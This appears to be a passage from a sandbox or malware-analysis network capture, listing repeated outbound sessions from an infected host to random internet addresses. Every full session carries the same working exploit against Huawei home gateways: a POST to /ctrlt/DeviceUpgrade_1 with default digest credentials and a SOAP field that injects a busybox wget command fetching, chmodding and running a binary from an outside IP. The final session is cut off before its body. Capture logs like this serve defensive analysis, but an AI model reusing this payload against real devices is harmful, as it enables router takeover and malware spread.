                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1069192.168.2.1536798222.82.93.1037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929467916 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1070192.168.2.1555360157.169.248.6937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929502010 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1071192.168.2.155518894.221.191.22437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929502010 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1072192.168.2.155045241.3.125.19337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929514885 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1073192.168.2.1532790102.14.74.937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929532051 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1074192.168.2.1547568156.81.191.6437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929562092 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1075192.168.2.1554528197.205.190.2037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929570913 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1076192.168.2.1537216121.246.132.3337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929603100 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1077192.168.2.1554688121.82.5.13337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929604053 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1078192.168.2.1538206122.30.203.18537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929606915 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1079192.168.2.1559908197.197.228.4337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929646015 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
